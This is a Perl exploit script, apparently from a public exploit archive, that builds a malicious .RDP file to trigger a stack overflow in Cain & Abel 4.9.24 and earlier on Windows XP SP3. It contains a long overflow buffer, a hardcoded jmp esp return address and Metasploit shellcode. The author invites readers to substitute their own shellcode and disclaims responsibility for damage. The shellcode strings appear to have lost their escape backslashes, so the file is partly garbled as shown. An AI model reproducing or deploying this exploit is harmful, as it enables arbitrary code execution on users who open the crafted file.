#!/usr/bin/perl
#
# Cain & Abel <= v4.9.24 .RDP Stack Overflow Exploit
# Exploit by SkD (skdrat@hotmail.com)
# -----------------------------------------------
#
# Nothing much to say about this one. This works on
# an updated Windows XP SP3. On Vista this exploit is way easier
# the more challenging one was on XP, and here it is.
# Enjoy :). Also remember if you want to put your own shellcode
# there are a few character restrictions and using Alpha2 or
# Alpha Numerical won't work at all.
# To open the .RDP file in Cain & Abel, click the
# "Remote Password Decoder Dialog" icon.
# Credits to Encrypt3d.M!nd.
# {Author has no responsibility over the damage you do with this!}

use strict; use warnings;

# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"x29xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x19".
"xc5xd8x59x83xebxfcxe2xf4xe5x2dx9cx59x19xc5x53x1c".
"x25x4exa4x5cx61xc4x37xd2x56xddx53x06x39xc4x33x10".
"x92xf1x53x58xf7xf4x18xc0xb5x41x18x2dx1ex04x12x54".
"x18x07x33xadx22x91xfcx5dx6cx20x53x06x3dxc4x33x3f".
"x92xc9x93xd2x46xd9xd9xb2x92xd9x53x58xf2x4cx84x7d".
"x1dx06xe9x99x7dx4ex98x69x9cx05xa0x55x92x85xd4xd2".
"x69xd9x75xd2x71xcdx33x50x92x45x68x59x19xc5x53x31".
"x25x9axe9xafx79x93x51xa1x9ax05xa3x09x71x35x52x5d".
"x46xadx40xa7x93xcbx8fxa6xfexa6xb9x35x7axebxbdx21".
"x7cxc5xd8x59";
my $addr = "xb5xb5xfdx7f";
my $overflow = "x41" x 8206 ;
my $overflow2 = "x41" x 255 ;
my $eip = "xd7x30x9dx7c"; #   FOR WINDOWS XP SP3:  0x7c9d30d7       jmp esp (shell32.dll)

open(my $rdp, "> s.rdp");
print $rdp $overflow.$eip.$addr.$overflow2.$shellcode;
close($rdp);

# www.Syue.com [2008-11-30]